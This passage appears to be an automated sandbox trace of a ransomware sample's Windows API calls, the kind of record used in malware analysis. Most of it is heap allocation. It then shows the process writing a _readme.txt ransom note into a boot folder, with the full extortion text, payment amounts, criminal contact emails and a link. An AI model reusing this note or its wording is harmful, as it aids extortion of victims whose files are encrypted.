lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.162] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.162] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.163] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.163] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.164] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.164] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e428 [0056.166] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0056.166] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.166] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.166] PathFindFileNameW (pszPath="") returned="" [0056.166] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.166] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.166] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.166] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e428 | out: hHeap=0x660000) returned 1 [0056.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0056.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0056.166] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0056.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.167] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0056.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.167] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.167] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.167] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x326aa18 [0056.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326aa18, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.168] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x32acff0 [0056.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.168] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.168] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.168] WriteFile (in: hFile=0x5c8, lpBuffer=0x32acff0*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x32acff0*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.169] CloseHandle (hObject=0x5c8) returned 1 [0056.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.169] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.169] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.169] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.169] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.169] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.169] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.169] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.170] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.170] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.170] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.170] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.170] 